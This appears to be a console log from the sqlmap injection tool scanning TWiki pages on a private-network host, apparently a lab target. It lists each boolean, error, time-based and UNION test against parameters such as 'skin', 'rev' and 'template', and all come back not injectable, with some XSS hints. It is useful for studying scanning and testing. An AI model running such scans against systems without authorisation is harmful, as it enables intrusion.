[19:28:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:28:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:28:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:28:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:28:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:28:48] [INFO] testing 'MySQL inline queries'
[19:28:48] [INFO] testing 'PostgreSQL inline queries'
[19:28:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:28:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:28:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:28:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:28:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:28:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:28:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:28:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:28:51] [INFO] testing 'Oracle AND time-based blind'
[19:28:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:28:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:28:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:29:01] [WARNING] GET parameter 'template' is not injectable
[19:29:01] [INFO] testing if GET parameter 'param1' is dynamic
[19:29:01] [WARNING] GET parameter 'param1' does not appear dynamic
[19:29:01] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[19:29:01] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[19:29:01] [INFO] testing for SQL injection on GET parameter 'param1'
[19:29:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:29:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:29:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:29:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:29:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:29:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:29:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:29:05] [INFO] testing 'MySQL inline queries'
[19:29:05] [INFO] testing 'PostgreSQL inline queries'
[19:29:06] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:29:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:29:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:29:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:29:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:29:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:29:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:29:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:29:09] [INFO] testing 'Oracle AND time-based blind'
[19:29:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:29:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:29:25] [WARNING] GET parameter 'param1' is not injectable
[19:29:25] [INFO] testing if GET parameter 'param2' is dynamic
[19:29:26] [WARNING] GET parameter 'param2' does not appear dynamic
[19:29:26] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[19:29:26] [INFO] testing for SQL injection on GET parameter 'param2'
[19:29:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:29:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:29:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:29:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:29:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:29:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:29:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:29:30] [INFO] testing 'MySQL inline queries'
[19:29:30] [INFO] testing 'PostgreSQL inline queries'
[19:29:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:29:30] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:29:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:29:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:29:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:29:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:29:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:29:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:29:34] [INFO] testing 'Oracle AND time-based blind'
[19:29:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:29:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:29:50] [WARNING] GET parameter 'param2' is not injectable
[19:29:50] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 112:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiFAQ?t=1441457226
do you want to test this URL? [Y/n/q]
> Y
[19:29:50] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiFAQ?t=1441457226'
[19:29:50] [INFO] testing connection to the target URL
[19:29:51] [INFO] testing if the target URL is stable
[19:29:51] [INFO] target URL is stable
[19:29:51] [INFO] testing if GET parameter 't' is dynamic
[19:29:51] [WARNING] GET parameter 't' does not appear dynamic
[19:29:52] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[19:29:52] [INFO] testing for SQL injection on GET parameter 't'
[19:29:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:29:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:29:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:29:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:29:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:29:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:29:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:29:55] [INFO] testing 'MySQL inline queries'
[19:29:55] [INFO] testing 'PostgreSQL inline queries'
[19:29:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:29:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:29:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:29:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:29:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:29:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:29:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:29:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:29:58] [INFO] testing 'Oracle AND time-based blind'
[19:29:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:29:59] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:30:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:30:10] [WARNING] GET parameter 't' is not injectable
[19:30:10] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 113:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *FAQ[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[19:30:10] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=TWiki *FAQ[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:30:10] [INFO] testing connection to the target URL
[19:30:11] [INFO] testing if the target URL is stable
[19:30:12] [INFO] target URL is stable
[19:30:12] [INFO] testing if URI parameter '#1*' is dynamic
[19:30:12] [WARNING] URI parameter '#1*' does not appear dynamic
[19:30:12] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:30:12] [INFO] testing for SQL injection on URI parameter '#1*'
[19:30:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:30:12] [WARNING] reflective value(s) found and filtering out
[19:30:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:30:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:30:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:30:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:30:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:30:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:30:16] [INFO] testing 'MySQL inline queries'
[19:30:16] [INFO] testing 'PostgreSQL inline queries'
[19:30:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:30:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:30:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:30:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:30:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:30:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:30:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:30:19] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:30:20] [INFO] testing 'Oracle AND time-based blind'
[19:30:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:30:20] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:30:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:30:33] [WARNING] URI parameter '#1*' is not injectable
[19:30:33] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 114:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiFAQ?skin=print
do you want to test this URL? [Y/n/q]
> Y
[19:30:33] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiFAQ?skin=print'
[19:30:33] [INFO] testing connection to the target URL
[19:30:34] [INFO] testing if the target URL is stable
[19:30:34] [INFO] target URL is stable
[19:30:34] [INFO] testing if GET parameter 'skin' is dynamic
[19:30:35] [INFO] confirming that GET parameter 'skin' is dynamic
[19:30:35] [INFO] GET parameter 'skin' is dynamic
[19:30:35] [INFO] heuristics detected web page charset 'ascii'
[19:30:35] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[19:30:36] [INFO] testing for SQL injection on GET parameter 'skin'
[19:30:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:30:36] [WARNING] reflective value(s) found and filtering out
[19:30:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:30:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:30:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:30:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:30:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:30:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:30:54] [INFO] testing 'MySQL inline queries'
[19:30:54] [INFO] testing 'PostgreSQL inline queries'
[19:30:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:30:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:30:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:30:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:31:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:31:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:31:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:31:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:31:12] [INFO] testing 'Oracle AND time-based blind'
[19:31:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:31:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:31:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:32:13] [WARNING] GET parameter 'skin' is not injectable
[19:32:13] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 115:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiFAQ?rev1=1.13&rev2=1.12
do you want to test this URL? [Y/n/q]
> Y
[19:32:13] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiFAQ?rev1=1.13&rev2=1.12'
[19:32:13] [INFO] testing connection to the target URL
[19:32:14] [INFO] testing if the target URL is stable
[19:32:15] [INFO] target URL is stable
[19:32:15] [INFO] testing if GET parameter 'rev1' is dynamic
[19:32:15] [WARNING] GET parameter 'rev1' does not appear dynamic
[19:32:16] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[19:32:16] [INFO] testing for SQL injection on GET parameter 'rev1'
[19:32:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:32:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:32:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:32:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:32:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:32:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:32:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:32:28] [INFO] testing 'MySQL inline queries'
[19:32:28] [INFO] testing 'PostgreSQL inline queries'
[19:32:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:32:29] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:32:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:32:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:32:30] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:32:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:32:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:32:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:32:32] [INFO] testing 'Oracle AND time-based blind'
[19:32:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:32:32] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:32:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:32:44] [WARNING] GET parameter 'rev1' is not injectable
[19:32:44] [INFO] testing if GET parameter 'rev2' is dynamic
[19:32:45] [WARNING] GET parameter 'rev2' does not appear dynamic
[19:32:45] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[19:32:45] [INFO] testing for SQL injection on GET parameter 'rev2'
[19:32:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:32:46] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:32:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:32:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:32:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:32:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:32:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:32:49] [INFO] testing 'MySQL inline queries'
[19:32:49] [INFO] testing 'PostgreSQL inline queries'
[19:32:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:32:50] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:32:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:32:50] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:32:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:32:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:32:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:32:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:32:53] [INFO] testing 'Oracle AND time-based blind'
[19:32:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:33:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:33:48] [WARNING] GET parameter 'rev2' is not injectable
[19:33:49] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 116:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiFAQ?rev=1.12
do you want to test this URL? [Y/n/q]
> Y
[19:33:49] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiFAQ?rev=1.12'
[19:33:49] [INFO] testing connection to the target URL
[19:33:50] [INFO] testing if the target URL is stable
[19:33:50] [INFO] target URL is stable
[19:33:50] [INFO] testing if GET parameter 'rev' is dynamic
[19:33:51] [WARNING] GET parameter 'rev' does not appear dynamic
[19:33:51] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[19:33:51] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[19:33:51] [INFO] testing for SQL injection on GET parameter 'rev'
[19:33:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:33:52] [WARNING] reflective value(s) found and filtering out
[19:33:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:33:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:34:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:34:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:34:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:34:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:34:09] [INFO] testing 'MySQL inline queries'
[19:34:09] [INFO] testing 'PostgreSQL inline queries'
[19:34:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:34:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:34:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:34:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:34:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:34:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:34:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:34:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:34:25] [INFO] testing 'Oracle AND time-based blind'
[19:34:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:34:28] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:34:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:35:23] [WARNING] GET parameter 'rev' is not injectable
[19:35:23] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:35:23] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiFAQ?rev1=1.12&rev2=1.11'
[19:35:23] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiFAQ?rev=1.11'
URL 117:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiFAQ?template=oopsmore&param1=1.13&param2=1.13
do you want to test this URL? [Y/n/q]
> Y
[19:35:23] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiFAQ?template=oopsmore&param1=1.13&param2=1.13'
[19:35:23] [INFO] testing connection to the target URL
[19:35:23] [INFO] testing if the target URL is stable
[19:35:24] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:35:24] [INFO] testing if GET parameter 'template' is dynamic
[19:35:24] [INFO] confirming that GET parameter 'template' is dynamic
[19:35:25] [INFO] GET parameter 'template' is dynamic
[19:35:25] [INFO] heuristics detected web page charset 'ascii'
[19:35:25] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[19:35:25] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[19:35:25] [INFO] testing for SQL injection on GET parameter 'template'
[19:35:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:35:26] [WARNING] reflective value(s) found and filtering out
[19:35:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:35:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:35:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:35:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:35:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:35:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:35:37] [INFO] testing 'MySQL inline queries'
[19:35:38] [INFO] testing 'PostgreSQL inline queries'
[19:35:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:35:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:35:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:35:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:35:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:35:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:35:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:35:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:35:50] [INFO] testing 'Oracle AND time-based blind'
[19:35:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:35:52] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:36:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:36:30] [WARNING] GET parameter 'template' is not injectable
[19:36:30] [INFO] testing if GET parameter 'param1' is dynamic
[19:36:30] [WARNING] GET parameter 'param1' does not appear dynamic
[19:36:31] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[19:36:31] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[19:36:31] [INFO] testing for SQL injection on GET parameter 'param1'
[19:36:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:36:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:36:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:36:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:36:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:36:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:36:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:36:46] [INFO] testing 'MySQL inline queries'
[19:36:47] [INFO] testing 'PostgreSQL inline queries'
[19:36:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:36:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:36:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:36:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:36:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:36:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:36:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:36:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:37:00] [INFO] testing 'Oracle AND time-based blind'
[19:37:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:37:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:37:59] [WARNING] GET parameter 'param1' is not injectable
[19:37:59] [INFO] testing if GET parameter 'param2' is dynamic
[19:37:59] [WARNING] GET parameter 'param2' does not appear dynamic
[19:37:59] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[19:38:00] [INFO] testing for SQL injection on GET parameter 'param2'
[19:38:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:38:05] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:38:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:38:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:38:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:38:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:38:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:38:12] [INFO] testing 'MySQL inline queries'
[19:38:12] [INFO] testing 'PostgreSQL inline queries'
[19:38:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:38:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:38:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:38:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:38:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:38:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:38:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:38:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:38:27] [INFO] testing 'Oracle AND time-based blind'
[19:38:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:38:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:39:17] [WARNING] GET parameter 'param2' is not injectable
